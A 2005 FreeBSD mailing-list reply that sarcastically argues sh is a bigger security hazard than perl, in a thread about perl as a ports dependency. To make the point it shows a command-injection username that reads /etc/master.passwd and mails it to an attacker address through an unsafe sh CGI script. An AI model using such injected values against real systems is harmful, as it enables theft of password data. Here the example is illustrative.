perl and ports

Loren M. Lang lorenl at
Fri Feb 4 19:44:46 PST 2005

On Tue, Jan 25, 2005 at 11:41:56PM +0100, Gert Cuykens wrote:
> ps who is the imake developer ?
> Believe me i am going to mail every developer where perl comes in
> between me and the application :P

Actually, I think you should work on sh first, it's a much bigger
security hazard than perl.  If you've ever written much sh, you'd
realize with it's much loser syntax, it's easy to get into trouble.  At
least perl provides use strict and -Tw.  Someone using sh to write cgi
scripts is the worst.  Imagine someone writing the following like for a
sh cgi script where $USERNAME is a cgi paramater passed into the
following script:

echo "<HTML><HEAD><TITLE>Welcome, " $USERNAME "</TITLE></HEAD>"

What if someone wrote the following username and apache was running as

charlie; cat /etc/master.passwd | mail haZ0rZ at; echo

Well, they would just of gotten a hold of your entire database of
usernames and password and you'd never know about it.  So therefore sh
is a MUCH bigger security risk and we should work on removing it as a
requirement of EVERY single app that currently uses it so we don't have
to worry about it being installed.

> I dont want perl , i know it can do great things but i dont want it.
> Its a bit like internet explorer browser or msn messenger in windows.
> I just want a windows not a browser or a messenger.
> I want a freebsd with cvsup x11 and a gnome-lite desktop. Its what i
> like about freebsd filosofie you have a house and you can chose your
> own freebsd port furniture. For me perl is a closet that i dont want
> because it doesnt go well with my php painting and my apache carpet.
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I sense much NT in you.
NT leads to Bluescreen.
Bluescreen leads to downtime.
Downtime leads to suffering.
NT is the path to the darkside.
Powerful Unix is.

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